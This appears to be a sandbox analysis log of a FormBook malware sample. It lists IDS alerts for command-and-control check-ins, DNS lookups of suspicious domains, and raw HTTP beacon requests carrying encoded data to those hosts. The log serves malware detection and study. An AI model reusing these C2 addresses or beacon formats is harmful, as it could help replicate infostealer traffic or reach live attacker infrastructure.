                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 5.39.10.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50007 -> 5.39.10.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50035 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50041 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50047 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50069 -> 209.74.64.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50075 -> 209.74.64.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50081 -> 209.74.64.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50087 -> 209.74.64.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50105 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50107 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50111 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50109 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50117 -> 47.238.157.253:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50118 -> 47.238.157.253:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50110 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50106 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50108 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50119 -> 67.223.117.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50115 -> 47.238.157.253:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50120 -> 67.223.117.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50103 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50104 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50112 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50122 -> 67.223.117.169:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50113 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50114 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50125 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50126 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50123 -> 67.223.117.169:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50127 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50124 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50116 -> 47.238.157.253:80
                Source: DNS query: www.swenansiansie.xyz
                Source: DNS query: www.mp3cevir.xyz
                Source: DNS query: www.restobarbebek.xyz
                Source: DNS query: www.restobarbebek.xyz
                Source: Joe Sandbox ViewIP Address: 85.159.66.93 85.159.66.93
                Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
                Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
                Source: Joe Sandbox ViewASN Name: CHARTER-20115US CHARTER-20115US
                Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /jquery-3.6.3.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: code.jquery.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /b?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /b2?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-AliveCookie: UID=10451f5f0fc3adf6ec43d6f1733906392
                Source: global trafficHTTP traffic detected: GET /b?rn=1733906391803&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-AliveCookie: UID=10451f5f0fc3adf6ec43d6f1733906392
                Source: global trafficHTTP traffic detected: GET /ast/ast.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: acdn.adnxs.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /enzp/?rJl09=1ZZ8JloHsT&x6lPJLCP=cVkvAZaY29GpnsZyqIF2yuifFE7HKV6pnqAC3WUldb4fq/7Oh6qhLNzjv12xoDmrSb6mv5wmBpstJhqJzvfwj9LP9u3P+B96vBaOMx3H/c3knsZvSPscaH9VeTyek1Wueg== HTTP/1.1Host: www.sidqwdf.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /08fk/?x6lPJLCP=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a2c74LOyggA49CLKBjXnF5RURV/WQoh8PUXC31RcEPJm/FQ==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.swenansiansie.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /v70f/?x6lPJLCP=BBAjdqWYBB/MRyq00dIcezl7OvIx5dSebduL9p4zICzjFNfvyshgEJ0+kFvLW81K0aQqDuxS3lz73s8YF+5iQllq44F7p5XcgmXLNN6nBjN0OyNZNCI3LIrenW8X1LlSCw==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.spectre.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /6sgf/?rJl09=1ZZ8JloHsT&x6lPJLCP=6iGJK9crk1nRcZ4JnjW5XFV8mHNB14071bVcqkX9tU6kQKoAsGb7iBX66eKgx6XFHSItuyLYYeRhUgDlnjjXc53AprHIV9+v08MymvOxMZcaRpk3N2TApqLdZWOdbNTanQ== HTTP/1.1Host: www.synd.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /ohf8/?x6lPJLCP=ll5dDbshsmxjCV2KoC1RTtNOe9IddMOnmIejqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqPbYAwUAuWDp6UnVXFlAI3b5100n+OibKRbWUxoSKuxi8jQ==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.jagdud.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /gofy/?rJl09=1ZZ8JloHsT&x6lPJLCP=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iYwq1hqOz1ZLmRiq4yHoZPRguvsYQiOAaJNLLKitFG0GncQ== HTTP/1.1Host: www.wiretap.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /5l50/?x6lPJLCP=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBnieG4J/eeLMerUPxhx3GPRLnwREz1wysoKm2qVDM0wOtjw3A==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.it2sp8.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /cvmn/?rJl09=1ZZ8JloHsT&x6lPJLCP=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+rlqihV/9WGn7dFY/VPBSofhkjf/J1JjJf3ZvirEaB7f293g== HTTP/1.1Host: www.cbprecise.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /tjfd/?x6lPJLCP=hU18Z//aae7PuBg9apJb96loanMP5/1Vub46+YuE1RepJ+epEltxKOfVY+omXPiOW2IODI1uSb7TTTd0R0t6pBQ2oDkul8elmVnFCv+DogCI8xDe2U6+F55NhYNnYDS/oA==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.yun08ps.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /mbcs/?x6lPJLCP=E8uKnHhByG2Tv3dXt0hUXbTg8EJLb11h3Xjfw3eru7l4vir7amLvL6eqi8CHILvLkZwm8qiwgwp5C/0JAU8dkG6IkADn3bpuAlwPLI3cNsyNCOAib3p0DeKOekQmhkdC2g==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.rtpsilva4d.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /jm9b/?x6lPJLCP=XoRMlRQavUBSvHE6AV2eFSHD1vC94NgmQfaFO5StTzEKBs4nBsZa6I2TGaV3pACayJ+XHXZH2+vi6MzB3UVztjakyssOm3dqQA7FXQmUsXh8tqb4LmqnuepmKmLDXrWJpg==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.restobarbebek.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: 000003.log4.19.dr, uu_host_config.19.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log4.19.dr, uu_host_config.19.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log4.19.dr, uu_host_config.19.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: msapplication.xml1.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x40e72453,0x01db4ba8</date><accdate>0x40e72453,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                Source: msapplication.xml6.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x40eff9ba,0x01db4ba8</date><accdate>0x40eff9ba,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                Source: msapplication.xml8.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x40f266f1,0x01db4ba8</date><accdate>0x40f4d257,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: www.sidqwdf.fun
                Source: global trafficDNS traffic detected: DNS query: www.msn.com
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: api.msn.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: global trafficDNS traffic detected: DNS query: c.msn.com
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.com
                Source: global trafficDNS traffic detected: DNS query: acdn.adnxs.com
                Source: global trafficDNS traffic detected: DNS query: www.swenansiansie.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mp3cevir.xyz
                Source: global trafficDNS traffic detected: DNS query: www.spectre.center
                Source: global trafficDNS traffic detected: DNS query: www.synd.fun
                Source: global trafficDNS traffic detected: DNS query: www.jagdud.store
                Source: global trafficDNS traffic detected: DNS query: www.wiretap.digital
                Source: global trafficDNS traffic detected: DNS query: www.it2sp8.vip
                Source: global trafficDNS traffic detected: DNS query: www.cbprecise.online
                Source: global trafficDNS traffic detected: DNS query: www.yun08ps.top
                Source: global trafficDNS traffic detected: DNS query: www.rtpsilva4d.click
                Source: global trafficDNS traffic detected: DNS query: www.restobarbebek.xyz
                Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 11 Dec 2024 08:40:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 11 Dec 2024 08:40:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 11 Dec 2024 08:40:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 08:40:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 